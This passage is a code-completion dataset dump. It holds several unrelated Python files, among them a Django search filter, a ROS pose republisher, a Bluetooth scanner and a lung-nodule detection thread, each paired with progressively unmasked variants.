BatchNormalization(momentum=.9)(output)\n assert len(skips) == 0\n m = Model([input_], [output])\n\n if pretrained_weights:\n m.load_weights(pretrained_weights)\n\n m.compile(optimizer=Adam(), loss='binary_crossentropy', metrics=['accuracy'])\n return m",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from django import forms
from django.utils.translation import gettext_lazy as _
import django_filters
from elasticsearch_dsl.query import Q
class BaseSearchFilterSet(django_filters.FilterSet):
query_fields = ["content"]
q = django_filters.CharFilter(
method="auto_query",
widget=forms.TextInput(
attrs={"placeholder": _("Enter search term"), "class": "form-control"}
),
)
def __init__(self, *args, **kwargs):
self.facet_config = kwargs.pop("facet_config", {})
self.view = kwargs.pop("view", None)
super().__init__(*args, **kwargs)
def apply_filter(self, qs, name, *args, **kwargs):
if name in self.facet_config:
return qs.post_filter(name, *args, **kwargs)
return qs.filter(*args, **kwargs)
def filter_queryset(self, queryset):
"""
Filter the queryset with the underlying form's `cleaned_data`. You must
call `is_valid()` or `errors` before calling this method.
This method should be overridden if additional filtering needs to be
applied to the queryset before it is cached.
"""
for name, value in self.form.cleaned_data.items():
queryset = self.filters[name].filter(queryset, value)
# assert isinstance(queryset, models.QuerySet), \
# "Expected '%s.%s' to return a QuerySet, but got a %s instead." \
# % (type(self).__name__, name, type(queryset).__name__)
return queryset
def auto_query(self, qs, name, value):
if value:
return qs.set_query(
Q(
"simple_query_string",
query=value,
fields=self.query_fields,
default_operator="and",
lenient=True,
)
)
return qs
|
normal
|
{
"blob_id": "f225fbf363f1b170704418ed339f2e57ca790975",
"index": 5317,
"step-1": "<mask token>\n\n\nclass BaseSearchFilterSet(django_filters.FilterSet):\n <mask token>\n <mask token>\n\n def __init__(self, *args, **kwargs):\n self.facet_config = kwargs.pop('facet_config', {})\n self.view = kwargs.pop('view', None)\n super().__init__(*args, **kwargs)\n\n def apply_filter(self, qs, name, *args, **kwargs):\n if name in self.facet_config:\n return qs.post_filter(name, *args, **kwargs)\n return qs.filter(*args, **kwargs)\n <mask token>\n\n def auto_query(self, qs, name, value):\n if value:\n return qs.set_query(Q('simple_query_string', query=value,\n fields=self.query_fields, default_operator='and', lenient=True)\n )\n return qs\n",
"step-2": "<mask token>\n\n\nclass BaseSearchFilterSet(django_filters.FilterSet):\n <mask token>\n <mask token>\n\n def __init__(self, *args, **kwargs):\n self.facet_config = kwargs.pop('facet_config', {})\n self.view = kwargs.pop('view', None)\n super().__init__(*args, **kwargs)\n\n def apply_filter(self, qs, name, *args, **kwargs):\n if name in self.facet_config:\n return qs.post_filter(name, *args, **kwargs)\n return qs.filter(*args, **kwargs)\n\n def filter_queryset(self, queryset):\n \"\"\"\n Filter the queryset with the underlying form's `cleaned_data`. You must\n call `is_valid()` or `errors` before calling this method.\n This method should be overridden if additional filtering needs to be\n applied to the queryset before it is cached.\n \"\"\"\n for name, value in self.form.cleaned_data.items():\n queryset = self.filters[name].filter(queryset, value)\n return queryset\n\n def auto_query(self, qs, name, value):\n if value:\n return qs.set_query(Q('simple_query_string', query=value,\n fields=self.query_fields, default_operator='and', lenient=True)\n )\n return qs\n",
"step-3": "<mask token>\n\n\nclass BaseSearchFilterSet(django_filters.FilterSet):\n query_fields = ['content']\n q = django_filters.CharFilter(method='auto_query', widget=forms.\n TextInput(attrs={'placeholder': _('Enter search term'), 'class':\n 'form-control'}))\n\n def __init__(self, *args, **kwargs):\n self.facet_config = kwargs.pop('facet_config', {})\n self.view = kwargs.pop('view', None)\n super().__init__(*args, **kwargs)\n\n def apply_filter(self, qs, name, *args, **kwargs):\n if name in self.facet_config:\n return qs.post_filter(name, *args, **kwargs)\n return qs.filter(*args, **kwargs)\n\n def filter_queryset(self, queryset):\n \"\"\"\n Filter the queryset with the underlying form's `cleaned_data`. You must\n call `is_valid()` or `errors` before calling this method.\n This method should be overridden if additional filtering needs to be\n applied to the queryset before it is cached.\n \"\"\"\n for name, value in self.form.cleaned_data.items():\n queryset = self.filters[name].filter(queryset, value)\n return queryset\n\n def auto_query(self, qs, name, value):\n if value:\n return qs.set_query(Q('simple_query_string', query=value,\n fields=self.query_fields, default_operator='and', lenient=True)\n )\n return qs\n",
"step-4": "from django import forms\nfrom django.utils.translation import gettext_lazy as _\nimport django_filters\nfrom elasticsearch_dsl.query import Q\n\n\nclass BaseSearchFilterSet(django_filters.FilterSet):\n query_fields = ['content']\n q = django_filters.CharFilter(method='auto_query', widget=forms.\n TextInput(attrs={'placeholder': _('Enter search term'), 'class':\n 'form-control'}))\n\n def __init__(self, *args, **kwargs):\n self.facet_config = kwargs.pop('facet_config', {})\n self.view = kwargs.pop('view', None)\n super().__init__(*args, **kwargs)\n\n def apply_filter(self, qs, name, *args, **kwargs):\n if name in self.facet_config:\n return qs.post_filter(name, *args, **kwargs)\n return qs.filter(*args, **kwargs)\n\n def filter_queryset(self, queryset):\n \"\"\"\n Filter the queryset with the underlying form's `cleaned_data`. You must\n call `is_valid()` or `errors` before calling this method.\n This method should be overridden if additional filtering needs to be\n applied to the queryset before it is cached.\n \"\"\"\n for name, value in self.form.cleaned_data.items():\n queryset = self.filters[name].filter(queryset, value)\n return queryset\n\n def auto_query(self, qs, name, value):\n if value:\n return qs.set_query(Q('simple_query_string', query=value,\n fields=self.query_fields, default_operator='and', lenient=True)\n )\n return qs\n",
"step-5": "from django import forms\nfrom django.utils.translation import gettext_lazy as _\n\nimport django_filters\nfrom elasticsearch_dsl.query import Q\n\n\nclass BaseSearchFilterSet(django_filters.FilterSet):\n query_fields = [\"content\"]\n\n q = django_filters.CharFilter(\n method=\"auto_query\",\n widget=forms.TextInput(\n attrs={\"placeholder\": _(\"Enter search term\"), \"class\": \"form-control\"}\n ),\n )\n\n def __init__(self, *args, **kwargs):\n self.facet_config = kwargs.pop(\"facet_config\", {})\n self.view = kwargs.pop(\"view\", None)\n super().__init__(*args, **kwargs)\n\n def apply_filter(self, qs, name, *args, **kwargs):\n if name in self.facet_config:\n return qs.post_filter(name, *args, **kwargs)\n return qs.filter(*args, **kwargs)\n\n def filter_queryset(self, queryset):\n \"\"\"\n Filter the queryset with the underlying form's `cleaned_data`. You must\n call `is_valid()` or `errors` before calling this method.\n This method should be overridden if additional filtering needs to be\n applied to the queryset before it is cached.\n \"\"\"\n for name, value in self.form.cleaned_data.items():\n queryset = self.filters[name].filter(queryset, value)\n # assert isinstance(queryset, models.QuerySet), \\\n # \"Expected '%s.%s' to return a QuerySet, but got a %s instead.\" \\\n # % (type(self).__name__, name, type(queryset).__name__)\n return queryset\n\n def auto_query(self, qs, name, value):\n if value:\n return qs.set_query(\n Q(\n \"simple_query_string\",\n query=value,\n fields=self.query_fields,\n default_operator=\"and\",\n lenient=True,\n )\n )\n return qs\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
import requests
#try make the request
try:
r = requests.get('http://skitter.com')
print(r) # see the results
# catch a failue
except (requests.ConnectionError, requests.Timeout) as x:
pass
|
normal
|
{
"blob_id": "a26cab29f0777764f014eeff13745be60e55b62d",
"index": 724,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ntry:\n r = requests.get('http://skitter.com')\n print(r)\nexcept (requests.ConnectionError, requests.Timeout) as x:\n pass\n",
"step-3": "import requests\ntry:\n r = requests.get('http://skitter.com')\n print(r)\nexcept (requests.ConnectionError, requests.Timeout) as x:\n pass\n",
"step-4": "import requests\n\n#try make the request\ntry:\n\tr = requests.get('http://skitter.com')\n\tprint(r)\t# see the results\n\n# catch a failue\nexcept (requests.ConnectionError, requests.Timeout) as x:\n\tpass",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#!/usr/bin/env python
import rospy
import cv2
from geometry_msgs.msg import PoseStamped
class PositionReader:
def __init__(self):
self.image_sub = rospy.Subscriber(
"/visp_auto_tracker/object_position", PoseStamped, self.callback)
self.pub = rospy.Publisher('object_position', PoseStamped, queue_size=10)
rospy.init_node('PositionReader', anonymous=False)
self.data = PoseStamped()
def callback(self, data):
if(self.data.pose.position.x != data.pose.position.x):
self.pub.publish(data)
print(data)
self.data = data
if __name__ == '__main__':
try:
PositionReader()
rospy.spin()
except rospy.ROSInterruptException:
cv2.destroyAllWindows()
pass
|
normal
|
{
"blob_id": "26ac0c94d0ab70d90854ca2c913ef0f633b54a3c",
"index": 4527,
"step-1": "<mask token>\n\n\nclass PositionReader:\n\n def __init__(self):\n self.image_sub = rospy.Subscriber('/visp_auto_tracker/object_position',\n PoseStamped, self.callback)\n self.pub = rospy.Publisher('object_position', PoseStamped,\n queue_size=10)\n rospy.init_node('PositionReader', anonymous=False)\n self.data = PoseStamped()\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass PositionReader:\n\n def __init__(self):\n self.image_sub = rospy.Subscriber('/visp_auto_tracker/object_position',\n PoseStamped, self.callback)\n self.pub = rospy.Publisher('object_position', PoseStamped,\n queue_size=10)\n rospy.init_node('PositionReader', anonymous=False)\n self.data = PoseStamped()\n\n def callback(self, data):\n if self.data.pose.position.x != data.pose.position.x:\n self.pub.publish(data)\n print(data)\n self.data = data\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass PositionReader:\n\n def __init__(self):\n self.image_sub = rospy.Subscriber('/visp_auto_tracker/object_position',\n PoseStamped, self.callback)\n self.pub = rospy.Publisher('object_position', PoseStamped,\n queue_size=10)\n rospy.init_node('PositionReader', anonymous=False)\n self.data = PoseStamped()\n\n def callback(self, data):\n if self.data.pose.position.x != data.pose.position.x:\n self.pub.publish(data)\n print(data)\n self.data = data\n\n\nif __name__ == '__main__':\n try:\n PositionReader()\n rospy.spin()\n except rospy.ROSInterruptException:\n cv2.destroyAllWindows()\n pass\n",
"step-4": "import rospy\nimport cv2\nfrom geometry_msgs.msg import PoseStamped\n\n\nclass PositionReader:\n\n def __init__(self):\n self.image_sub = rospy.Subscriber('/visp_auto_tracker/object_position',\n PoseStamped, self.callback)\n self.pub = rospy.Publisher('object_position', PoseStamped,\n queue_size=10)\n rospy.init_node('PositionReader', anonymous=False)\n self.data = PoseStamped()\n\n def callback(self, data):\n if self.data.pose.position.x != data.pose.position.x:\n self.pub.publish(data)\n print(data)\n self.data = data\n\n\nif __name__ == '__main__':\n try:\n PositionReader()\n rospy.spin()\n except rospy.ROSInterruptException:\n cv2.destroyAllWindows()\n pass\n",
"step-5": "#!/usr/bin/env python\n\nimport rospy\nimport cv2\nfrom geometry_msgs.msg import PoseStamped\n\n\nclass PositionReader:\n\n def __init__(self):\n self.image_sub = rospy.Subscriber(\n \"/visp_auto_tracker/object_position\", PoseStamped, self.callback)\n self.pub = rospy.Publisher('object_position', PoseStamped, queue_size=10)\n rospy.init_node('PositionReader', anonymous=False)\n self.data = PoseStamped()\n\n def callback(self, data):\n if(self.data.pose.position.x != data.pose.position.x):\n self.pub.publish(data)\n print(data)\n self.data = data\n\nif __name__ == '__main__':\n try:\n PositionReader()\n rospy.spin()\n except rospy.ROSInterruptException:\n cv2.destroyAllWindows()\n pass\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
#!/usr/bin/env python3
import gatt
class AnyDevice(gatt.Device):
def connect_succeeded(self):
super().connect_succeeded()
print("[%s] Connected" % (self.mac_address))
def connect_failed(self, error):
super().connect_failed(error)
print("[%s] Connection failed: %s" % (self.mac_address, str(error)))
def disconnect_succeeded(self):
super().disconnect_succeeded()
print("[%s] Disconnected" % (self.mac_address))
def services_resolved(self):
super().services_resolved()
print("[%s] Resolved services" % (self.mac_address))
for service in self.services:
print("[%s] Service [%s]" % (self.mac_address, service.uuid))
for characteristic in service.characteristics:
print("[%s] Characteristic [%s]" % (self.mac_address, characteristic.uuid))
print(dir(characteristic))
print("*****")
class AnyDeviceManager(gatt.DeviceManager):
def __init__(self, adapter_name, mac_list):
super().__init__(adapter_name)
self.mac_list = mac_list
def device_discovered(self, device):
#print("Discovered [%s] %s" % (device.mac_address, device.alias()))
if ('powertap' in device.alias() and 'L' in device.alias()):
print(device.mac_address)
manager.stop()
manager = AnyDeviceManager(adapter_name='hci0',mac_list=[])
manager.start_discovery()
manager.run()
#74:5c:4b:0b:4e:f2
#device = AnyDevice(mac_address='66:12:d1:56:6b:3c', manager=manager)
|
normal
|
{
"blob_id": "480e636cfe28f2509d8ecf1e6e89924e994f100d",
"index": 4888,
"step-1": "<mask token>\n\n\nclass AnyDevice(gatt.Device):\n <mask token>\n\n def connect_failed(self, error):\n super().connect_failed(error)\n print('[%s] Connection failed: %s' % (self.mac_address, str(error)))\n <mask token>\n <mask token>\n\n\nclass AnyDeviceManager(gatt.DeviceManager):\n\n def __init__(self, adapter_name, mac_list):\n super().__init__(adapter_name)\n self.mac_list = mac_list\n\n def device_discovered(self, device):\n if 'powertap' in device.alias() and 'L' in device.alias():\n print(device.mac_address)\n manager.stop()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass AnyDevice(gatt.Device):\n\n def connect_succeeded(self):\n super().connect_succeeded()\n print('[%s] Connected' % self.mac_address)\n\n def connect_failed(self, error):\n super().connect_failed(error)\n print('[%s] Connection failed: %s' % (self.mac_address, str(error)))\n\n def disconnect_succeeded(self):\n super().disconnect_succeeded()\n print('[%s] Disconnected' % self.mac_address)\n <mask token>\n\n\nclass AnyDeviceManager(gatt.DeviceManager):\n\n def __init__(self, adapter_name, mac_list):\n super().__init__(adapter_name)\n self.mac_list = mac_list\n\n def device_discovered(self, device):\n if 'powertap' in device.alias() and 'L' in device.alias():\n print(device.mac_address)\n manager.stop()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass AnyDevice(gatt.Device):\n\n def connect_succeeded(self):\n super().connect_succeeded()\n print('[%s] Connected' % self.mac_address)\n\n def connect_failed(self, error):\n super().connect_failed(error)\n print('[%s] Connection failed: %s' % (self.mac_address, str(error)))\n\n def disconnect_succeeded(self):\n super().disconnect_succeeded()\n print('[%s] Disconnected' % self.mac_address)\n\n def services_resolved(self):\n super().services_resolved()\n print('[%s] Resolved services' % self.mac_address)\n for service in self.services:\n print('[%s] Service [%s]' % (self.mac_address, service.uuid))\n for characteristic in service.characteristics:\n print('[%s] Characteristic [%s]' % (self.mac_address,\n characteristic.uuid))\n print(dir(characteristic))\n print('*****')\n\n\nclass AnyDeviceManager(gatt.DeviceManager):\n\n def __init__(self, adapter_name, mac_list):\n super().__init__(adapter_name)\n self.mac_list = mac_list\n\n def device_discovered(self, device):\n if 'powertap' in device.alias() and 'L' in device.alias():\n print(device.mac_address)\n manager.stop()\n\n\n<mask token>\nmanager.start_discovery()\nmanager.run()\n",
"step-4": "import gatt\n\n\nclass AnyDevice(gatt.Device):\n\n def connect_succeeded(self):\n super().connect_succeeded()\n print('[%s] Connected' % self.mac_address)\n\n def connect_failed(self, error):\n super().connect_failed(error)\n print('[%s] Connection failed: %s' % (self.mac_address, str(error)))\n\n def disconnect_succeeded(self):\n super().disconnect_succeeded()\n print('[%s] Disconnected' % self.mac_address)\n\n def services_resolved(self):\n super().services_resolved()\n print('[%s] Resolved services' % self.mac_address)\n for service in self.services:\n print('[%s] Service [%s]' % (self.mac_address, service.uuid))\n for characteristic in service.characteristics:\n print('[%s] Characteristic [%s]' % (self.mac_address,\n characteristic.uuid))\n print(dir(characteristic))\n print('*****')\n\n\nclass AnyDeviceManager(gatt.DeviceManager):\n\n def __init__(self, adapter_name, mac_list):\n super().__init__(adapter_name)\n self.mac_list = mac_list\n\n def device_discovered(self, device):\n if 'powertap' in device.alias() and 'L' in device.alias():\n print(device.mac_address)\n manager.stop()\n\n\nmanager = AnyDeviceManager(adapter_name='hci0', mac_list=[])\nmanager.start_discovery()\nmanager.run()\n",
"step-5": "#!/usr/bin/env python3\nimport gatt\n\nclass AnyDevice(gatt.Device):\n def connect_succeeded(self):\n super().connect_succeeded()\n print(\"[%s] Connected\" % (self.mac_address))\n\n def connect_failed(self, error):\n super().connect_failed(error)\n print(\"[%s] Connection failed: %s\" % (self.mac_address, str(error)))\n\n def disconnect_succeeded(self):\n super().disconnect_succeeded()\n print(\"[%s] Disconnected\" % (self.mac_address))\n\n def services_resolved(self):\n super().services_resolved()\n\n print(\"[%s] Resolved services\" % (self.mac_address))\n for service in self.services:\n print(\"[%s] Service [%s]\" % (self.mac_address, service.uuid))\n for characteristic in service.characteristics:\n print(\"[%s] Characteristic [%s]\" % (self.mac_address, characteristic.uuid))\n print(dir(characteristic))\n print(\"*****\")\n\n\nclass AnyDeviceManager(gatt.DeviceManager):\n def __init__(self, adapter_name, mac_list):\n super().__init__(adapter_name)\n self.mac_list = mac_list\n\n def device_discovered(self, device):\n #print(\"Discovered [%s] %s\" % (device.mac_address, device.alias()))\n if ('powertap' in device.alias() and 'L' in device.alias()):\n print(device.mac_address)\n manager.stop()\n \nmanager = AnyDeviceManager(adapter_name='hci0',mac_list=[])\nmanager.start_discovery()\nmanager.run()\n\n\n#74:5c:4b:0b:4e:f2\n\n\n#device = AnyDevice(mac_address='66:12:d1:56:6b:3c', manager=manager)\n\n",
"step-ids": [
5,
7,
9,
11,
12
]
}
|
[
5,
7,
9,
11,
12
] |
import threading
import time
# import numpy as np
import pickle
from utils.ret_utils import error_info
from nodule_class.isnodule import LungIsncls
from preprocessing.location import lobe_locate_gmm
from detection.lung_detection import LungDetection
from func_timeout import FunctionTimedOut
from func_timeout import func_set_timeout
import weakref
class GpuThread(threading.Thread):
def __init__(self, que_det, que_ret, index):
threading.Thread.__init__(self)
self.que_det = que_det
self.que_ret = que_ret
self.index = index
self.lung_dete = LungDetection("./model/det.ckpt", self.index)
# is nodule cls
self.lung_isnc = LungIsncls("./model/isn.ckpt", self.index)
l_u = pickle._Unpickler(open("./model/left_gmm.pkl", "rb"))
l_u.encoding = "latin1"
self.left_gmm = l_u.load()
r_u = pickle._Unpickler(open("./model/right_gmm.pkl", "rb"))
r_u.encoding = "latin1"
self.right_gmm = r_u.load()
# cudnn.benchmark = True
def run(self):
i = 0
while True:
result_dict = self.que_det.get(block=True)
try:
print(
time.ctime(),
" ",
result_dict["json_id"],
" Using GPU Device ",
self.index,
)
t_s = time.time()
nodule_df = self.lung_dete.prediction(
result_dict["prep_data"],
result_dict["prep_spac"],
result_dict["prep_ebox"],
result_dict["prep_mask"],
)
print(
time.ctime(),
" ",
result_dict["json_id"],
"GPU DOING USE TIME(lung dete prediction):",
time.time() - t_s,
)
t_s = time.time()
preb = self.lung_isnc.nodule_cls(
nodule_df, result_dict["prep_case"], result_dict["prep_spac"]
)
print(
time.ctime(),
" ",
result_dict["json_id"],
"GPU DOING USE TIME(lung isnc nodule cls):",
time.time() - t_s,
)
# preb = lung_isnc.nodule_cls(nodule_df, result_dict['prep_case'], result_dict['prep_spac'])
# del lung_isnc
t_s = time.time()
preb = self.lung_lobe(preb, result_dict["prep_mask"])
result_dict["nodule_preb"] = preb
self.que_ret.put(result_dict, timeout=2)
print(
time.ctime(),
" ",
result_dict["json_id"],
"GPU DOING US TIME(lung lobe):",
time.time() - t_s,
)
i += 1
del result_dict, nodule_df, preb
except FunctionTimedOut:
print(time.ctime(), result_dict["json_id"], "GPU FUN TIMEOUT ")
except Exception as e:
if result_dict and "json_id" in result_dict.keys():
print(
time.ctime()
+ "GPU ERROR : {} {}".format(e, result_dict["json_id"])
)
error_info(200, result_dict)
else:
print(time.ctime() + "GPU ERROR : {}".format(e))
@func_set_timeout(5)
def lung_lobe(self, nodule_df, mask):
nodule_df_values = nodule_df[["coordX", "coordY", "coordZ"]].values
lungs = []
lobes = []
lobel_info = []
for nodule in nodule_df_values:
lung, lobe = lobe_locate_gmm(nodule, mask, self.left_gmm, self.right_gmm)
lungs.append(lung)
lobes.append(lobe)
lobel_info.append(lung + "肺" + (lobe + "叶" if not lobe == "" else ""))
nodule_df["lung"] = lungs
nodule_df["lobe"] = lobes
nodule_df["lobel_info"] = lobel_info
return nodule_df
|
normal
|
{
"blob_id": "8035f195cd01dc50691cd93ea91a6377b1d83f24",
"index": 1166,
"step-1": "<mask token>\n\n\nclass GpuThread(threading.Thread):\n <mask token>\n\n def run(self):\n i = 0\n while True:\n result_dict = self.que_det.get(block=True)\n try:\n print(time.ctime(), ' ', result_dict['json_id'],\n ' Using GPU Device ', self.index)\n t_s = time.time()\n nodule_df = self.lung_dete.prediction(result_dict[\n 'prep_data'], result_dict['prep_spac'], result_dict[\n 'prep_ebox'], result_dict['prep_mask'])\n print(time.ctime(), ' ', result_dict['json_id'],\n 'GPU DOING USE TIME(lung dete prediction):', time.time(\n ) - t_s)\n t_s = time.time()\n preb = self.lung_isnc.nodule_cls(nodule_df, result_dict[\n 'prep_case'], result_dict['prep_spac'])\n print(time.ctime(), ' ', result_dict['json_id'],\n 'GPU DOING USE TIME(lung isnc nodule cls):', time.time(\n ) - t_s)\n t_s = time.time()\n preb = self.lung_lobe(preb, result_dict['prep_mask'])\n result_dict['nodule_preb'] = preb\n self.que_ret.put(result_dict, timeout=2)\n print(time.ctime(), ' ', result_dict['json_id'],\n 'GPU DOING US TIME(lung lobe):', time.time() - t_s)\n i += 1\n del result_dict, nodule_df, preb\n except FunctionTimedOut:\n print(time.ctime(), result_dict['json_id'], 'GPU FUN TIMEOUT ')\n except Exception as e:\n if result_dict and 'json_id' in result_dict.keys():\n print(time.ctime() + 'GPU ERROR : {} {}'.format(e,\n result_dict['json_id']))\n error_info(200, result_dict)\n else:\n print(time.ctime() + 'GPU ERROR : {}'.format(e))\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass GpuThread(threading.Thread):\n\n def __init__(self, que_det, que_ret, index):\n threading.Thread.__init__(self)\n self.que_det = que_det\n self.que_ret = que_ret\n self.index = index\n self.lung_dete = LungDetection('./model/det.ckpt', self.index)\n self.lung_isnc = LungIsncls('./model/isn.ckpt', self.index)\n l_u = pickle._Unpickler(open('./model/left_gmm.pkl', 'rb'))\n l_u.encoding = 'latin1'\n self.left_gmm = l_u.load()\n r_u = pickle._Unpickler(open('./model/right_gmm.pkl', 'rb'))\n r_u.encoding = 'latin1'\n self.right_gmm = r_u.load()\n\n def run(self):\n i = 0\n while True:\n result_dict = self.que_det.get(block=True)\n try:\n print(time.ctime(), ' ', result_dict['json_id'],\n ' Using GPU Device ', self.index)\n t_s = time.time()\n nodule_df = self.lung_dete.prediction(result_dict[\n 'prep_data'], result_dict['prep_spac'], result_dict[\n 'prep_ebox'], result_dict['prep_mask'])\n print(time.ctime(), ' ', result_dict['json_id'],\n 'GPU DOING USE TIME(lung dete prediction):', time.time(\n ) - t_s)\n t_s = time.time()\n preb = self.lung_isnc.nodule_cls(nodule_df, result_dict[\n 'prep_case'], result_dict['prep_spac'])\n print(time.ctime(), ' ', result_dict['json_id'],\n 'GPU DOING USE TIME(lung isnc nodule cls):', time.time(\n ) - t_s)\n t_s = time.time()\n preb = self.lung_lobe(preb, result_dict['prep_mask'])\n result_dict['nodule_preb'] = preb\n self.que_ret.put(result_dict, timeout=2)\n print(time.ctime(), ' ', result_dict['json_id'],\n 'GPU DOING US TIME(lung lobe):', time.time() - t_s)\n i += 1\n del result_dict, nodule_df, preb\n except FunctionTimedOut:\n print(time.ctime(), result_dict['json_id'], 'GPU FUN TIMEOUT ')\n except Exception as e:\n if result_dict and 'json_id' in result_dict.keys():\n print(time.ctime() + 'GPU ERROR : {} {}'.format(e,\n result_dict['json_id']))\n error_info(200, result_dict)\n else:\n print(time.ctime() + 'GPU ERROR : {}'.format(e))\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass GpuThread(threading.Thread):\n\n def __init__(self, que_det, que_ret, index):\n threading.Thread.__init__(self)\n self.que_det = que_det\n self.que_ret = que_ret\n self.index = index\n self.lung_dete = LungDetection('./model/det.ckpt', self.index)\n self.lung_isnc = LungIsncls('./model/isn.ckpt', self.index)\n l_u = pickle._Unpickler(open('./model/left_gmm.pkl', 'rb'))\n l_u.encoding = 'latin1'\n self.left_gmm = l_u.load()\n r_u = pickle._Unpickler(open('./model/right_gmm.pkl', 'rb'))\n r_u.encoding = 'latin1'\n self.right_gmm = r_u.load()\n\n def run(self):\n i = 0\n while True:\n result_dict = self.que_det.get(block=True)\n try:\n print(time.ctime(), ' ', result_dict['json_id'],\n ' Using GPU Device ', self.index)\n t_s = time.time()\n nodule_df = self.lung_dete.prediction(result_dict[\n 'prep_data'], result_dict['prep_spac'], result_dict[\n 'prep_ebox'], result_dict['prep_mask'])\n print(time.ctime(), ' ', result_dict['json_id'],\n 'GPU DOING USE TIME(lung dete prediction):', time.time(\n ) - t_s)\n t_s = time.time()\n preb = self.lung_isnc.nodule_cls(nodule_df, result_dict[\n 'prep_case'], result_dict['prep_spac'])\n print(time.ctime(), ' ', result_dict['json_id'],\n 'GPU DOING USE TIME(lung isnc nodule cls):', time.time(\n ) - t_s)\n t_s = time.time()\n preb = self.lung_lobe(preb, result_dict['prep_mask'])\n result_dict['nodule_preb'] = preb\n self.que_ret.put(result_dict, timeout=2)\n print(time.ctime(), ' ', result_dict['json_id'],\n 'GPU DOING US TIME(lung lobe):', time.time() - t_s)\n i += 1\n del result_dict, nodule_df, preb\n except FunctionTimedOut:\n print(time.ctime(), result_dict['json_id'], 'GPU FUN TIMEOUT ')\n except Exception as e:\n if result_dict and 'json_id' in result_dict.keys():\n print(time.ctime() + 'GPU ERROR : {} {}'.format(e,\n result_dict['json_id']))\n error_info(200, result_dict)\n else:\n print(time.ctime() + 'GPU ERROR : {}'.format(e))\n\n @func_set_timeout(5)\n def lung_lobe(self, nodule_df, mask):\n nodule_df_values = nodule_df[['coordX', 'coordY', 'coordZ']].values\n lungs = []\n lobes = []\n lobel_info = []\n for nodule in nodule_df_values:\n lung, lobe = lobe_locate_gmm(nodule, mask, self.left_gmm, self.\n right_gmm)\n lungs.append(lung)\n lobes.append(lobe)\n lobel_info.append(lung + '肺' + (lobe + '叶' if not lobe == '' else\n ''))\n nodule_df['lung'] = lungs\n nodule_df['lobe'] = lobes\n nodule_df['lobel_info'] = lobel_info\n return nodule_df\n",
"step-4": "import threading\nimport time\nimport pickle\nfrom utils.ret_utils import error_info\nfrom nodule_class.isnodule import LungIsncls\nfrom preprocessing.location import lobe_locate_gmm\nfrom detection.lung_detection import LungDetection\nfrom func_timeout import FunctionTimedOut\nfrom func_timeout import func_set_timeout\nimport weakref\n\n\nclass GpuThread(threading.Thread):\n\n def __init__(self, que_det, que_ret, index):\n threading.Thread.__init__(self)\n self.que_det = que_det\n self.que_ret = que_ret\n self.index = index\n self.lung_dete = LungDetection('./model/det.ckpt', self.index)\n self.lung_isnc = LungIsncls('./model/isn.ckpt', self.index)\n l_u = pickle._Unpickler(open('./model/left_gmm.pkl', 'rb'))\n l_u.encoding = 'latin1'\n self.left_gmm = l_u.load()\n r_u = pickle._Unpickler(open('./model/right_gmm.pkl', 'rb'))\n r_u.encoding = 'latin1'\n self.right_gmm = r_u.load()\n\n def run(self):\n i = 0\n while True:\n result_dict = self.que_det.get(block=True)\n try:\n print(time.ctime(), ' ', result_dict['json_id'],\n ' Using GPU Device ', self.index)\n t_s = time.time()\n nodule_df = self.lung_dete.prediction(result_dict[\n 'prep_data'], result_dict['prep_spac'], result_dict[\n 'prep_ebox'], result_dict['prep_mask'])\n print(time.ctime(), ' ', result_dict['json_id'],\n 'GPU DOING USE TIME(lung dete prediction):', time.time(\n ) - t_s)\n t_s = time.time()\n preb = self.lung_isnc.nodule_cls(nodule_df, result_dict[\n 'prep_case'], result_dict['prep_spac'])\n print(time.ctime(), ' ', result_dict['json_id'],\n 'GPU DOING USE TIME(lung isnc nodule cls):', time.time(\n ) - t_s)\n t_s = time.time()\n preb = self.lung_lobe(preb, result_dict['prep_mask'])\n result_dict['nodule_preb'] = preb\n self.que_ret.put(result_dict, timeout=2)\n print(time.ctime(), ' ', result_dict['json_id'],\n 'GPU DOING US TIME(lung lobe):', time.time() - t_s)\n i += 1\n del result_dict, nodule_df, preb\n except FunctionTimedOut:\n print(time.ctime(), result_dict['json_id'], 'GPU FUN TIMEOUT ')\n except Exception as e:\n if result_dict and 'json_id' in result_dict.keys():\n print(time.ctime() + 'GPU ERROR : {} {}'.format(e,\n result_dict['json_id']))\n error_info(200, result_dict)\n else:\n print(time.ctime() + 'GPU ERROR : {}'.format(e))\n\n @func_set_timeout(5)\n def lung_lobe(self, nodule_df, mask):\n nodule_df_values = nodule_df[['coordX', 'coordY', 'coordZ']].values\n lungs = []\n lobes = []\n lobel_info = []\n for nodule in nodule_df_values:\n lung, lobe = lobe_locate_gmm(nodule, mask, self.left_gmm, self.\n right_gmm)\n lungs.append(lung)\n lobes.append(lobe)\n lobel_info.append(lung + '肺' + (lobe + '叶' if not lobe == '' else\n ''))\n nodule_df['lung'] = lungs\n nodule_df['lobe'] = lobes\n nodule_df['lobel_info'] = lobel_info\n return nodule_df\n",
